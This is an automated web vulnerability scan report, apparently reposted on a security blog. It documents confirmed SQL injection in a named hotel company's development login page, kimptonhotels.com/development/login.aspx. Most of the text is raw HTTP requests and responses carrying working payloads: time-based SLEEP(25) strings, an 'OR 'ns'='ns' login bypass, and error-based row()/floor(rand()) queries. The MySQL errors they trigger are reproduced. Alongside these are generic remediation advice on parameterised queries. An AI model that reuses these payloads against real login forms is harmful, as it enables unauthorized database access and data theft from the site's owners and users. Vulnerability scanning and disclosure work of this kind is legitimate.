XSS.CX Home XSS.CX Research Blog

The DORK Report

Loading



Netsparker, Web Application Security Scanner

NETSPARKER SCAN REPORT SUMMARY

Netsparker - Scan Report Summary
TARGET URL
http://www.kimptonhotels.com/
SCAN DATE
10/5/2010 9:57:29 PM
REPORT DATE
10/6/2010 7:30:09 AM
SCAN DURATION
02:46:53.9062500

Total Requests

82148

Average Speed

8.20 req/sec.
73
identified
11
confirmed
7
critical
60
informational

SCAN SETTINGS

Scan Settings
PROFILE
Previous Settings
ENABLED ENGINES
Static Tests, Find Backup Files, Blind SQL Injection, Boolean SQL Injection, Command Injection, HTTP Header Injection, Local File Inclusion, Open Redirection, Remote Code Evaluation, Remote File Inclusion, SQL Injection, Cross-site Scripting
Proxy
Authentication
Scheduled

VULNERABILITIES

Vulnerabilities
CRITICAL
10 %
IMPORTANT
1 %
LOW
7 %
INFORMATION
82 %
Blind SQL Injection

Blind SQL Injection

2 TOTAL
CRITICAL
CONFIRMED
2
SQL Injection occurs when data input for example by a user is interpreted as a SQL command rather than normal data by the backend database. This is an extremely common vulnerability and its successful exploitation can have critical implications. Netsparker confirmed the vulnerability by executing a test SQL Query on the back-end database. In these tests, SQL Injection was not obvious but the different responses from the page based on the injection test allowed us to identify and confirm the SQL Injection.

Impact

Depending on the backend database, the database connection settings and the operating system, an attacker can mount one or more of the following type of attacks successfully:
  • Reading, Updating and Deleting arbitrary data from the database
  • Executing commands on the underlying operating system
  • Reading, Updating and Deleting arbitrary tables from the database

Actions to Take

  1. See the remedy for solution.
  2. If you are not using a database access layer (DAL), consider using one. This will help you to centralise the issue. You can also use an ORM (object relational mapping). Most of the ORM systems use only parameterised queries and this can solve the whole SQL Injection problem.
  3. Locate the all dynamically generated SQL queries and convert them to parameterised queries. (If you decide to use a DAL/ORM change all legacy code to use these new libraries)
  4. Use your weblogs and application logs to see if there was any previous but undetected attack to this resource.

Remedy

A robust method for mitigating the threat of SQL Injection based vulnerabilities is to use parameterized queries (prepared statements). Almost all modern languages provide built in libraries for this. Wherever possible do not create dynamic SQL queries or SQL queries with string concatenation.

Required Skills for Successful Exploitation

There are numerous freely available tools to exploit SQL Injection vulnerabilities. This is a complex area with many dependencies, however it should be noted that the numerous resources available in this area have raised both attacker awareness of the issues and their ability to discover and leverage them. SQL Injection is one of the most common web application vulnerabilities.

External References

Remedy References

- /development/login.aspx

/development/login.aspx CONFIRMED

http://www.kimptonhotels.com/development/login.aspx

Parameters

Parameter Type Value
__EVENTARGUMENT POST 1
__EVENTTARGET POST 1
__EVENTVALIDATION POST /wEWBALS5/KZDwKL0/KVCgKxga/dBQLyiNGNB5AXOflGPXhQTwzu1bHDtWv0WGUq
__VIEWSTATE POST /wEPDwUKMTU5NzA4MzM2N2RkFD4Jmf5tuGqWkVKoE6S7mY3nw34=
pword POST -111' OR SLEEP(25)=0 LIMIT 1--
submitbutton POST Login
uname POST 1

Request

POST /development/login.aspx HTTP/1.1
Referer: http://www.kimptonhotels.com/development/login.aspx
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; CloudScan Vulnerability Crawler http://cloudscan.me)
Cache-Control: no-cache
Content-Type: application/x-www-form-urlencoded
Host: www.kimptonhotels.com
Cookie: ASP.NET_SessionId=u0sq4m45zz4eww453eyb32uc; ASPSESSIONIDAQQBQDDR=PIEFFPHBNHOLMDEFDPLEKMBE
Content-Length: 268
Accept-Encoding: gzip, deflate

__EVENTARGUMENT=1&__EVENTTARGET=1&__EVENTVALIDATION=%2fwEWBALS5%2fKZDwKL0%2fKVCgKxga%2fdBQLyiNGNB5AXOflGPXhQTwzu1bHDtWv0WGUq&__VIEWSTATE=%2fwEPDwUKMTU5NzA4MzM2N2RkFD4Jmf5tuGqWkVKoE6S7mY3nw34%3d&pword=-111%27%20OR%20SLEEP(25)=0%20LIMIT%201--+&submitbutton=Login&uname=1

Response

HTTP/1.1 302 Found
Date: Wed, 06 Oct 2010 04:23:24 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Location: /development/development-standards.aspx
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 160


<html><head><title>Object moved</title></head><body>
<h2>Object moved to <a href="%2fdevelopment%2fdevelopment-standards.aspx">here</a>.</h2>
</body></html>
- /development/login.aspx

/development/login.aspx CONFIRMED

http://www.kimptonhotels.com/development/login.aspx

Parameters

Parameter Type Value
__EVENTARGUMENT POST 1
__EVENTTARGET POST 1
__EVENTVALIDATION POST /wEWBALS5/KZDwKL0/KVCgKxga/dBQLyiNGNB5AXOflGPXhQTwzu1bHDtWv0WGUq
__VIEWSTATE POST /wEPDwUKMTU5NzA4MzM2N2RkFD4Jmf5tuGqWkVKoE6S7mY3nw34=
pword POST 1
submitbutton POST Login
uname POST -111' OR SLEEP(25)=0 LIMIT 1--

Request

POST /development/login.aspx HTTP/1.1
Referer: http://www.kimptonhotels.com/development/login.aspx
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; CloudScan Vulnerability Crawler http://cloudscan.me)
Cache-Control: no-cache
Content-Type: application/x-www-form-urlencoded
Host: www.kimptonhotels.com
Cookie: ASP.NET_SessionId=yopazwyxgsakjnnpmquwqn55; ASPSESSIONIDAQQBQDDR=PIEFFPHBNHOLMDEFDPLEKMBE
Content-Length: 268
Accept-Encoding: gzip, deflate

__EVENTARGUMENT=1&__EVENTTARGET=1&__EVENTVALIDATION=%2fwEWBALS5%2fKZDwKL0%2fKVCgKxga%2fdBQLyiNGNB5AXOflGPXhQTwzu1bHDtWv0WGUq&__VIEWSTATE=%2fwEPDwUKMTU5NzA4MzM2N2RkFD4Jmf5tuGqWkVKoE6S7mY3nw34%3d&pword=1&submitbutton=Login&uname=-111%27%20OR%20SLEEP(25)=0%20LIMIT%201--+

Response

HTTP/1.1 302 Found
Date: Wed, 06 Oct 2010 04:25:38 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Location: /development/development-standards.aspx
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 160


<html><head><title>Object moved</title></head><body>
<h2>Object moved to <a href="%2fdevelopment%2fdevelopment-standards.aspx">here</a>.</h2>
</body></html>
Boolean Based SQL Injection

Boolean Based SQL Injection

1 TOTAL
CRITICAL
CONFIRMED
1
SQL Injection occurs when data input for example by a user is interpreted as a SQL command rather than normal data by the backend database. This is an extremely common vulnerability and its successful exploitation can have critical implications. Netsparker confirmed the vulnerability by executing a test SQL Query on the back-end database. In these tests, SQL Injection was not obvious but the different responses from the page based on the injection test allowed Netsparker to identify and confirm the SQL Injection.

Impact

Depending on the backend database, the database connection settings and the operating system, an attacker can mount one or more of the following type of attacks successfully:
  • Reading, Updating and Deleting arbitrary data from the database
  • Executing commands on the underlying operating system
  • Reading, Updating and Deleting arbitrary tables from the database

Actions to Take

  1. See the remedy for solution.
  2. If you are not using a database access layer (DAL), consider using one. This will help you to centralise the issue. You can also use an ORM (object relational mapping). Most of the ORM systems use only parameterised queries and this can solve the whole SQL Injection problem.
  3. Locate all of the dynamically generated SQL queries and convert them to parameterised queries. (If you decide to use a DAL/ORM change all legacy code to use these new libraries)
  4. Use your weblogs and application logs to see if there was any previous but undetected attack to this resource.

Remedy

The best way to protect your code against SQL Injections is using parameterised queries (prepared statements). Almost all modern languages provide built in libraries for this. Wherever possible do not create dynamic SQL queries or SQL queries with string concatenation.

Required Skills for Successful Exploitation

There are numerous freely available tools to exploit SQL Injection vulnerabilities. This is a complex area with many dependencies, however it should be noted that the numerous resources available in this area have raised both attacker awareness of the issues and their ability to discover and leverage them.

External References

Remedy References

- /development/login.aspx

/development/login.aspx CONFIRMED

http://www.kimptonhotels.com/development/login.aspx

Parameters

Parameter Type Value
__EVENTARGUMENT POST 3
__EVENTTARGET POST 3
__EVENTVALIDATION POST /wEWBALS5/KZDwKL0/KVCgKxga/dBQLyiNGNB5AXOflGPXhQTwzu1bHDtWv0WGUq
__VIEWSTATE POST /wEPDwUKMTU5NzA4MzM2N2RkFD4Jmf5tuGqWkVKoE6S7mY3nw34=
pword POST ' OR 'ns'='ns
submitbutton POST Login
uname POST Ronald Smith

Request

POST /development/login.aspx HTTP/1.1
Referer: http://www.kimptonhotels.com/development/login.aspx
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; CloudScan Vulnerability Crawler http://cloudscan.me)
Cache-Control: no-cache
Content-Type: application/x-www-form-urlencoded
Host: www.kimptonhotels.com
Cookie: ASP.NET_SessionId=u0sq4m45zz4eww453eyb32uc; ASPSESSIONIDAQQBQDDR=PIEFFPHBNHOLMDEFDPLEKMBE
Content-Length: 251
Accept-Encoding: gzip, deflate

__EVENTARGUMENT=3&__EVENTTARGET=3&__EVENTVALIDATION=%2fwEWBALS5%2fKZDwKL0%2fKVCgKxga%2fdBQLyiNGNB5AXOflGPXhQTwzu1bHDtWv0WGUq&__VIEWSTATE=%2fwEPDwUKMTU5NzA4MzM2N2RkFD4Jmf5tuGqWkVKoE6S7mY3nw34%3d&pword=' OR 'ns'='ns&submitbutton=Login&uname=Ronald+Smith

Response

HTTP/1.1 302 Found
Date: Wed, 06 Oct 2010 04:24:29 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Location: /development/development-standards.aspx
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 160


<html><head><title>Object moved</title></head><body>
<h2>Object moved to <a href="%2fdevelopment%2fdevelopment-standards.aspx">here</a>.</h2>
</body></html>
SQL Injection

SQL Injection

2 TOTAL
CRITICAL
CONFIRMED
2
SQL Injection occurs when data input for example by a user is interpreted as a SQL command rather than normal data by the backend database. This is an extremely common vulnerability and its successful exploitation can have critical implications. Netsparker confirmed the vulnerability by executing a test SQL Query on the back-end database.

Impact

Depending on the backend database, the database connection settings and the operating system, an attacker can mount one or more of the following type of attacks successfully:
  • Reading, Updating and Deleting arbitrary data from the database
  • Executing commands on the underlying operating system
  • Reading, Updating and Deleting arbitrary tables from the database

Actions to Take

  1. See the remedy for solution.
  2. If you are not using a database access layer (DAL), consider using one. This will help you to centralise the issue. You can also use an ORM (object relational mapping). Most of the ORM systems use only parameterised queries and this can solve the whole SQL Injection problem.
  3. Locate all of the dynamically generated SQL queries and convert them to parameterised queries (If you decide to use a DAL/ORM, change all legacy code to use these new libraries)
  4. Use your weblogs and application logs to see if there was any previous but undetected attack to this resource.

Remedy

A robust method for mitigating the threat of SQL Injection based vulnerabilities is to use parameterized queries (prepared statements). Almost all modern languages provide built in libraries for this. Wherever possible do not create dynamic SQL queries or SQL queries with string concatenation.

Required Skills for Successful Exploitation

There are numerous freely available tools to exploit SQL Injection vulnerabilities. This is a complex area with many dependencies, however it should be noted that the numerous resources available in this area have raised both attacker awareness of the issues and their ability to discover and leverage them. SQL Injection is one of the most common web application vulnerabilities.

External References

Remedy References

- /development/login.aspx

/development/login.aspx CONFIRMED

http://www.kimptonhotels.com/development/login.aspx

Parameters

Parameter Type Value
__EVENTARGUMENT POST 3
__EVENTTARGET POST 3
__EVENTVALIDATION POST /wEWBALS5/KZDwKL0/KVCgKxga/dBQLyiNGNB5AXOflGPXhQTwzu1bHDtWv0WGUq
__VIEWSTATE POST /wEPDwUKMTU5NzA4MzM2N2RkFD4Jmf5tuGqWkVKoE6S7mY3nw34=
pword POST 1' or row(1,1)>(select count(*),concat(CONCAT(CHAR(95),CHAR(33),CHAR(64),CHAR(52),CHAR(100),CHAR(105),CHAR(108),CHAR(101),CHAR(109),CHAR(109),CHAR(97)),0x3a,floor(rand()*2))x from (select 1 union select 2)a group by x limit 1)-- 1
submitbutton POST Login
uname POST Ronald Smith

Request

POST /development/login.aspx HTTP/1.1
Referer: http://www.kimptonhotels.com/development/login.aspx
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; CloudScan Vulnerability Crawler http://cloudscan.me)
Cache-Control: no-cache
Content-Type: application/x-www-form-urlencoded
Host: www.kimptonhotels.com
Cookie: ASP.NET_SessionId=izxqi2md55dl3345s43dcm55; ASPSESSIONIDAQQBQDDR=PIEFFPHBNHOLMDEFDPLEKMBE
Content-Length: 500
Accept-Encoding: gzip, deflate

__EVENTARGUMENT=3&__EVENTTARGET=3&__EVENTVALIDATION=%2fwEWBALS5%2fKZDwKL0%2fKVCgKxga%2fdBQLyiNGNB5AXOflGPXhQTwzu1bHDtWv0WGUq&__VIEWSTATE=%2fwEPDwUKMTU5NzA4MzM2N2RkFD4Jmf5tuGqWkVKoE6S7mY3nw34%3d&pword=1%27+or+row(1%2c1)%3e(select+count(*)%2cconcat(CONCAT(CHAR(95)%2CCHAR(33)%2CCHAR(64)%2CCHAR(52)%2CCHAR(100)%2CCHAR(105)%2CCHAR(108)%2CCHAR(101)%2CCHAR(109)%2CCHAR(109)%2CCHAR(97))%2c0x3a%2cfloor(rand()*2))x+from+(select+1+union+select+2)a+group+by+x+limit+1)--+1&submitbutton=Login&uname=Ronald+Smith

Response

HTTP/1.1 200 OK
Date: Wed, 06 Oct 2010 04:22:48 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 4645



<!-- %@ import Namespace="MySql.Data.MySqlClient" % -->



<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">



<html>

<head>

<title>Kimpton Standards Login</title>

<link rel="stylesheet" type="text/css" href="../_css/global.css">
<style type="text/css">
<!--

body {
background: #FFFFFF;
}

-->
</style>
</head>



<body>

<form name="ctl00" method="POST" action="login.aspx" onsubmit="javascript:return WebForm_OnSubmit();" id="ctl00">
<div>
<input type="hidden" name="__EVENTTARGET" id="__EVENTTARGET" value="" />
<input type="hidden" name="__EVENTARGUMENT" id="__EVENTARGUMENT" value="" />
<input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwUKMTU5NzA4MzM2N2RkFD4Jmf5tuGqWkVKoE6S7mY3nw34=" />
</div>

<script type="text/javascript">
//<![CDATA[
var theForm = document.forms['ctl00'];
if (!theForm) {
theForm = document.ctl00;
}
function __doPostBack(eventTarget, eventArgument) {
if (!theForm.onsubmit || (theForm.onsubmit() != false)) {
theForm.__EVENTTARGET.value = eventTarget;
theForm.__EVENTARGUMENT.value = eventArgument;
theForm.submit();
}
}
//]]>
</script>


<script src="/WebResource.axd?d=-b7UqH0vtZuZGPZs3YNpmA2&amp;t=633925424339517500" type="text/javascript"></script>


<script src="/WebResource.axd?d=JFcpFU90xutwtLPW0qJGJ5vfTzBDcTMPuZSy1P53lIE1&amp;t=633925424339517500" type="text/javascript"></script>
<script type="text/javascript">
//<![CDATA[
function WebForm_OnSubmit() {
if (typeof(ValidatorOnSubmit) == "function" && ValidatorOnSubmit() == false) return false;
return true;
}
//]]>
</script>

<div>

<input type="hidden" name="__EVENTVALIDATION" id="__EVENTVALIDATION" value="/wEWBALS5/KZDwKL0/KVCgKxga/dBQLyiNGNB5AXOflGPXhQTwzu1bHDtWv0WGUq" />
</div>

<table border="0" width="600" valign="top" class="kim11">

<tr>

<td colspan="2"><img src="../assets/logo.gif" width="144" height="50" alt=""><br />

<p style="margin: 10px 0 0 6px; color: #007083; font-size: 15px;"><strong>Standards Access</strong></p></td>



</tr>
<tr>
<td colspan="2"><br />We could not process your request.<br />ERROR [HY000] [MySQL][ODBC 5.1 Driver][mysqld-5.0.83-community-nt]Duplicate entry '_!@4dilemma:0' for key 1</td>
</tr>

<tr>

<td width="100">
<p style="margin: 10px 0 0 6px;">
<strong>Username</strong>
<span id="runame" class="required" style="color:Red;visibility:hidden;">Required</span>
</p>
</td>

<td><input name="uname" type="text" value="Ronald Smith" id="uname" size="38" style="margin: 10px 0 0 0;" /></td>

</tr>

<tr valign="top">

<td width="100">
<p style="margin: 0 0 0 6px;">
<strong>Password</strong>
<span id="rpword" class="required" style="color:Red;visibility:hidden;">Required</span>
</p>
</td>

<td><input name="pword" type="text" value="1' or row(1,1)>(select count(*),concat(CONCAT(CHAR(95),CHAR(33),CHAR(64),CHAR(52),CHAR(100),CHAR(105),CHAR(108),CHAR(101),CHAR(109),CHAR(109),CHAR(97)),0x3a,floor(rand()*2))x from (select 1 union select 2)a group by x limit 1)-- 1" id="pword" size="38" style="margin: 10px 0 0 0;" /></td>

</tr>

<tr>

<td colspan="2"><input type="submit" name="submitbutton" value="Login" onclick="javascript:WebForm_DoPostBackWithOptions(new WebForm_PostBackOptions(&quot;submitbutton&quot;, &quot;&quot;, true, &quot;&quot;, &quot;&quot;, false, false))" id="submitbutton" /></td>

</tr>

</table>


<script type="text/javascript">
//<![CDATA[
var Page_Validators = new Array(document.getElementById("runame"), document.getElementById("rpword"));
//]]>
</script>

<script type="text/javascript">
//<![CDATA[
var runame = document.all ? document.all["runame"] : document.getElementById("runame");
runame.controltovalidate = "uname";
runame.errormessage = "Required";
runame.evaluationfunction = "RequiredFieldValidatorEvaluateIsValid";
runame.initialvalue = "";
var rpword = document.all ? document.all["rpword"] : document.getElementById("rpword");
rpword.controltovalidate = "pword";
rpword.errormessage = "Required";
rpword.evaluationfunction = "RequiredFieldValidatorEvaluateIsValid";
rpword.initialvalue = "";
//]]>
</script>


<script type="text/javascript">
//<![CDATA[

var Page_ValidationActive = false;
if (typeof(ValidatorOnLoad) == "function") {
ValidatorOnLoad();
}

function ValidatorOnSubmit() {
if (Page_ValidationActive) {
return ValidatorCommonOnSubmit();
}
else {
return true;
}
}
//]]>
</script>
</form>

</body>

</html>

- /development/login.aspx

/development/login.aspx CONFIRMED

http://www.kimptonhotels.com/development/login.aspx

Parameters

Parameter Type Value
__EVENTARGUMENT POST 3
__EVENTTARGET POST 3
__EVENTVALIDATION POST /wEWBALS5/KZDwKL0/KVCgKxga/dBQLyiNGNB5AXOflGPXhQTwzu1bHDtWv0WGUq
__VIEWSTATE POST /wEPDwUKMTU5NzA4MzM2N2RkFD4Jmf5tuGqWkVKoE6S7mY3nw34=
pword POST 3
submitbutton POST Login
uname POST 1' or row(1,1)>(select count(*),concat(CONCAT(CHAR(95),CHAR(33),CHAR(64),CHAR(52),CHAR(100),CHAR(105),CHAR(108),CHAR(101),CHAR(109),CHAR(109),CHAR(97)),0x3a,floor(rand()*2))x from (select 1 union select 2)a group by x limit 1)-- 1

Request

POST /development/login.aspx HTTP/1.1
Referer: http://www.kimptonhotels.com/development/login.aspx
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; CloudScan Vulnerability Crawler http://cloudscan.me)
Cache-Control: no-cache
Content-Type: application/x-www-form-urlencoded
Host: www.kimptonhotels.com
Cookie: ASP.NET_SessionId=s1brdh55x3sqf255y5i4kt45; ASPSESSIONIDAQQBQDDR=PIEFFPHBNHOLMDEFDPLEKMBE
Content-Length: 489
Accept-Encoding: gzip, deflate

__EVENTARGUMENT=3&__EVENTTARGET=3&__EVENTVALIDATION=%2fwEWBALS5%2fKZDwKL0%2fKVCgKxga%2fdBQLyiNGNB5AXOflGPXhQTwzu1bHDtWv0WGUq&__VIEWSTATE=%2fwEPDwUKMTU5NzA4MzM2N2RkFD4Jmf5tuGqWkVKoE6S7mY3nw34%3d&pword=3&submitbutton=Login&uname=1%27+or+row(1%2c1)%3e(select+count(*)%2cconcat(CONCAT(CHAR(95)%2CCHAR(33)%2CCHAR(64)%2CCHAR(52)%2CCHAR(100)%2CCHAR(105)%2CCHAR(108)%2CCHAR(101)%2CCHAR(109)%2CCHAR(109)%2CCHAR(97))%2c0x3a%2cfloor(rand()*2))x+from+(select+1+union+select+2)a+group+by+x+limit+1)--+1

Response

HTTP/1.1 200 OK
Date: Wed, 06 Oct 2010 04:24:43 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 4634



<!-- %@ import Namespace="MySql.Data.MySqlClient" % -->



<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">



<html>

<head>

<title>Kimpton Standards Login</title>

<link rel="stylesheet" type="text/css" href="../_css/global.css">
<style type="text/css">
<!--

body {
background: #FFFFFF;
}

-->
</style>
</head>



<body>

<form name="ctl00" method="POST" action="login.aspx" onsubmit="javascript:return WebForm_OnSubmit();" id="ctl00">
<div>
<input type="hidden" name="__EVENTTARGET" id="__EVENTTARGET" value="" />
<input type="hidden" name="__EVENTARGUMENT" id="__EVENTARGUMENT" value="" />
<input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwUKMTU5NzA4MzM2N2RkFD4Jmf5tuGqWkVKoE6S7mY3nw34=" />
</div>

<script type="text/javascript">
//<![CDATA[
var theForm = document.forms['ctl00'];
if (!theForm) {
theForm = document.ctl00;
}
function __doPostBack(eventTarget, eventArgument) {
if (!theForm.onsubmit || (theForm.onsubmit() != false)) {
theForm.__EVENTTARGET.value = eventTarget;
theForm.__EVENTARGUMENT.value = eventArgument;
theForm.submit();
}
}
//]]>
</script>


<script src="/WebResource.axd?d=-b7UqH0vtZuZGPZs3YNpmA2&amp;t=633925424339517500" type="text/javascript"></script>


<script src="/WebResource.axd?d=JFcpFU90xutwtLPW0qJGJ5vfTzBDcTMPuZSy1P53lIE1&amp;t=633925424339517500" type="text/javascript"></script>
<script type="text/javascript">
//<![CDATA[
function WebForm_OnSubmit() {
if (typeof(ValidatorOnSubmit) == "function" && ValidatorOnSubmit() == false) return false;
return true;
}
//]]>
</script>

<div>

<input type="hidden" name="__EVENTVALIDATION" id="__EVENTVALIDATION" value="/wEWBALS5/KZDwKL0/KVCgKxga/dBQLyiNGNB5AXOflGPXhQTwzu1bHDtWv0WGUq" />
</div>

<table border="0" width="600" valign="top" class="kim11">

<tr>

<td colspan="2"><img src="../assets/logo.gif" width="144" height="50" alt=""><br />

<p style="margin: 10px 0 0 6px; color: #007083; font-size: 15px;"><strong>Standards Access</strong></p></td>



</tr>
<tr>
<td colspan="2"><br />We could not process your request.<br />ERROR [HY000] [MySQL][ODBC 5.1 Driver][mysqld-5.0.83-community-nt]Duplicate entry '_!@4dilemma:0' for key 1</td>
</tr>

<tr>

<td width="100">
<p style="margin: 10px 0 0 6px;">
<strong>Username</strong>
<span id="runame" class="required" style="color:Red;visibility:hidden;">Required</span>
</p>
</td>

<td><input name="uname" type="text" value="1' or row(1,1)>(select count(*),concat(CONCAT(CHAR(95),CHAR(33),CHAR(64),CHAR(52),CHAR(100),CHAR(105),CHAR(108),CHAR(101),CHAR(109),CHAR(109),CHAR(97)),0x3a,floor(rand()*2))x from (select 1 union select 2)a group by x limit 1)-- 1" id="uname" size="38" style="margin: 10px 0 0 0;" /></td>

</tr>

<tr valign="top">

<td width="100">
<p style="margin: 0 0 0 6px;">
<strong>Password</strong>
<span id="rpword" class="required" style="color:Red;visibility:hidden;">Required</span>
</p>
</td>

<td><input name="pword" type="text" value="3" id="pword" size="38" style="margin: 10px 0 0 0;" /></td>

</tr>

<tr>

<td colspan="2"><input type="submit" name="submitbutton" value="Login" onclick="javascript:WebForm_DoPostBackWithOptions(new WebForm_PostBackOptions(&quot;submitbutton&quot;, &quot;&quot;, true, &quot;&quot;, &quot;&quot;, false, false))" id="submitbutton" /></td>

</tr>

</table>


<script type="text/javascript">
//<![CDATA[
var Page_Validators = new Array(document.getElementById("runame"), document.getElementById("rpword"));
//]]>
</script>

<script type="text/javascript">
//<![CDATA[
var runame = document.all ? document.all["runame"] : document.getElementById("runame");
runame.controltovalidate = "uname";
runame.errormessage = "Required";
runame.evaluationfunction = "RequiredFieldValidatorEvaluateIsValid";
runame.initialvalue = "";
var rpword = document.all ? document.all["rpword"] : document.getElementById("rpword");
rpword.controltovalidate = "pword";
rpword.errormessage = "Required";
rpword.evaluationfunction = "RequiredFieldValidatorEvaluateIsValid";
rpword.initialvalue = "";
//]]>
</script>


<script type="text/javascript">
//<![CDATA[

var Page_ValidationActive = false;
if (typeof(ValidatorOnLoad) == "function") {
ValidatorOnLoad();
}

function ValidatorOnSubmit() {
if (Page_ValidationActive) {
return ValidatorCommonOnSubmit();
}
else {
return true;
}
}
//]]>
</script>
</form>

</body>

</html>

[High Possibility] SQL Injection

[High Possibility] SQL Injection

2 TOTAL
CRITICAL
SQL Injection occurs when data input for example by a user is interpreted as a SQL command rather than normal data by the backend database. This is an extremely common vulnerability and its successful exploitation can have critical implications. Even though Netsparker believes that there is a SQL Injection in here it could not confirm it. There can be numerous reasons for Netsparker not being able to confirm this. We strongly recommend investigating the issue manually to ensure that it is an SQL Injection and that it needs to be addressed. You can also consider sending the details of this issue to us, in order that we can address this issue for the next time and give you a more precise result.

Impact

Depending on the backend database, database connection settings and the operating system, an attacker can mount one or more of the following type of attacks successfully:
  • Reading, Updating and Deleting arbitrary data from the database
  • Executing commands on the underlying operating system
  • Reading, Updating and Deleting arbitrary tables from the database

Actions to Take

  1. See the remedy for solution.
  2. If you are not using a database access layer (DAL) within the architecture consider its benefits and implement if appropriate. As a minimum the use of s DAL will help centralize the issue and its resolution. You can also use an ORM (object relational mapping). Most ORM systems use parameterized queries and this can solve many if not all SQL Injection based problems.
  3. Locate all of the dynamically generated SQL queries and convert them to parameterised queries. (If you decide to use a DAL/ORM, change all legacy code to use these new libraries)
  4. Monitor and review weblogs and application logs in order to uncover active or previous exploitation attempts.

Remedy

A very robust method for mitigating the threat of SQL Injection based vulnerabilities is to use parameterized queries (prepared statements). Almost all modern languages provide built in libraries for this. Wherever possible do not create dynamic SQL queries or SQL queries with string concatenation.

Required Skills for Successful Exploitation

There are numerous freely available tools to test for SQL Injection vulnerabilities. This is a complex area with many dependencies, however it should be noted that the numerous resources available in this area have raised both attacker awareness of the issues and their ability to discover and leverage them. SQL Injection is one of the most common web application vulnerabilities.

External References

Remedy References

- /development/login.aspx

/development/login.aspx

http://www.kimptonhotels.com/development/login.aspx

Parameters

Parameter Type Value
__EVENTARGUMENT POST 3
__EVENTTARGET POST 3
__EVENTVALIDATION POST /wEWBALS5/KZDwKL0/KVCgKxga/dBQLyiNGNB5AXOflGPXhQTwzu1bHDtWv0WGUq
__VIEWSTATE POST /wEPDwUKMTU5NzA4MzM2N2RkFD4Jmf5tuGqWkVKoE6S7mY3nw34=
pword POST '+ convert(int,(CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+CHAR(109)+CHAR(109)+CHAR(97))) +'
submitbutton POST Login
uname POST Ronald Smith

Request

POST /development/login.aspx HTTP/1.1
Referer: http://www.kimptonhotels.com/development/login.aspx
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; CloudScan Vulnerability Crawler http://cloudscan.me)
Cache-Control: no-cache
Content-Type: application/x-www-form-urlencoded
Host: www.kimptonhotels.com
Cookie: ASP.NET_SessionId=izxqi2md55dl3345s43dcm55; ASPSESSIONIDAQQBQDDR=PIEFFPHBNHOLMDEFDPLEKMBE
Content-Length: 391
Accept-Encoding: gzip, deflate

__EVENTARGUMENT=3&__EVENTTARGET=3&__EVENTVALIDATION=%2fwEWBALS5%2fKZDwKL0%2fKVCgKxga%2fdBQLyiNGNB5AXOflGPXhQTwzu1bHDtWv0WGUq&__VIEWSTATE=%2fwEPDwUKMTU5NzA4MzM2N2RkFD4Jmf5tuGqWkVKoE6S7mY3nw34%3d&pword='%2B%20convert(int,(CHAR(95)%2BCHAR(33)%2BCHAR(64)%2BCHAR(50)%2BCHAR(100)%2BCHAR(105)%2BCHAR(108)%2BCHAR(101)%2BCHAR(109)%2BCHAR(109)%2BCHAR(97)))%20%2B'&submitbutton=Login&uname=Ronald+Smith

Response

HTTP/1.1 200 OK
Date: Wed, 06 Oct 2010 04:22:45 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 4725



<!-- %@ import Namespace="MySql.Data.MySqlClient" % -->



<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">



<html>

<head>

<title>Kimpton Standards Login</title>

<link rel="stylesheet" type="text/css" href="../_css/global.css">
<style type="text/css">
<!--

body {
background: #FFFFFF;
}

-->
</style>
</head>



<body>

<form name="ctl00" method="POST" action="login.aspx" onsubmit="javascript:return WebForm_OnSubmit();" id="ctl00">
<div>
<input type="hidden" name="__EVENTTARGET" id="__EVENTTARGET" value="" />
<input type="hidden" name="__EVENTARGUMENT" id="__EVENTARGUMENT" value="" />
<input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwUKMTU5NzA4MzM2N2RkFD4Jmf5tuGqWkVKoE6S7mY3nw34=" />
</div>

<script type="text/javascript">
//<![CDATA[
var theForm = document.forms['ctl00'];
if (!theForm) {
theForm = document.ctl00;
}
function __doPostBack(eventTarget, eventArgument) {
if (!theForm.onsubmit || (theForm.onsubmit() != false)) {
theForm.__EVENTTARGET.value = eventTarget;
theForm.__EVENTARGUMENT.value = eventArgument;
theForm.submit();
}
}
//]]>
</script>


<script src="/WebResource.axd?d=-b7UqH0vtZuZGPZs3YNpmA2&amp;t=633925424339517500" type="text/javascript"></script>


<script src="/WebResource.axd?d=JFcpFU90xutwtLPW0qJGJ5vfTzBDcTMPuZSy1P53lIE1&amp;t=633925424339517500" type="text/javascript"></script>
<script type="text/javascript">
//<![CDATA[
